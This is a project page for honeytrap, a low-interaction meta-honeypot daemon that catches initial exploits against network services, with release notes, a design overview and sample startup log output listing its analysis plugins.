Latest ReleaseVersion 1.0.0: Revised configuration concept with more flexible module handling, analysis plugins can now create virtual attacks, 3 new plugins.
DownloadHoneytrap source packages are available from the sourceforge download repositories.
honeytrap A Dynamic Meta-Honeypot Daemon
Honeytrap is a low-interaction honeypot daemon for observing attacks against network services. In contrast to other honeypots, which often focus on malware collection, honeytrap aims for catching the initial exploit It collects and further processes attack traces.
Being able to process unknown attacks means that no pre-knowledge about a protocol or vulnerability can be used. However an incoming connection has to be handled in a meaningful manner. Honeytrap implements a dynamic server concept: for this purpose: It monitors the network stream for incoming sessions and starts aproppriate listeners just in time. Each listener can handle multiple connections and terminates itself after some idle time.
Below is the output of honeytrap 1.1.0 (svn version):
honeytrap v1.1.0 - Initializing. Loading plugin magicPE v0.0.1 Loading plugin ftpDownload v0.5.3 Loading plugin tftpDownload v0.4.1 Loading plugin b64Decode v0.3.1 Loading plugin vncDownload v0.3 Loading plugin SaveFile v0.2.1 Loading plugin submitPostgres v0.1.1 Servers will run as user honeytrap (1004). Servers will run as group nogroup (65534). Loading default responses. Connections will be handled in mirror mode by default. Logging to /opt/honeytrap/honeytrap.log. Initialization complete. honeytrap v1.1.0 Copyright (C) 2005-2008 Tillmann Werner
[2009-04-10 16:33:56] ---- Trapping attacks via NFQ. ---- [2009-04-10 16:34:11] ---- honeytrap stopped ----
Incoming data is handled as byte stream per session. This stream can be processed with different modules, e.g., for matching against certain patterns, decoding (for example base64 or XOR-ed shellcode), virus scanning, or execution of malware download commands.